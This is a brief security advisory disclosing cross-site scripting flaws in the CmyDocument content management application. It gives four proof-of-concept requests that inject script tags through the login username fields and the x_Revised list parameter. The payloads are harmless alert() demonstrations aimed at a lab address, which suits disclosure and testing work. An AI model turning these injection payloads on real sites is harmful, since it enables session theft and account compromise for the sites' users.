Title: CmyDocument Content Management Application - XSS Vulnerabilities Software : CmyDocument Content Management Application Software Version : Unknown(version update : 2010-01-10) Vendor: http://cmydocument.com/ Vulnerability Published : 2011-07-11 Vulnerability Update Time : Status : Impact : Medium Bug Description : CmyDocument Content Management Application(version update : 2010-01-10, possibly earlier versions) is vulnerable to XSS. Proof Of Concept : 1)username in login.asp,PoC: POST http://192.168.10.202/login.asp ------------------------------------ username="><script>alert('demonalex')</script>&password=bbb&rememberme=a&submit=+++Login+++ 2)username in login2.asp,PoC: POST http://192.168.10.202/login2.asp ------------------------------------ username="><script>alert('demonalex')</script>&password=bbb&rememberme=a&submit=+++Login+++ 3)x_Revised in myDoclist.asp,PoC: http://192.168.10.202/myDoclist.asp?x_Title=a&z_Title=LIKE&x_Revised=<SCRIPT>alert("demonalex");</SCRIPT>&z_Revised==&x_KeyWords=info&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE 4)x_Revised in myWebDoclist.asp,PoC: http://192.168.10.202/myWebDoclist.asp?x_Title=b&z_Title=LIKE&x_Revised=<SCRIPT>alert("demonalex");</SCRIPT>&z_Revised==&x_KeyWords=test&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE Credits : This vulnerability was discovered by demonalex(at)163(dot)com Pentester/Researcher Dark2S Security Team/PolyU.HK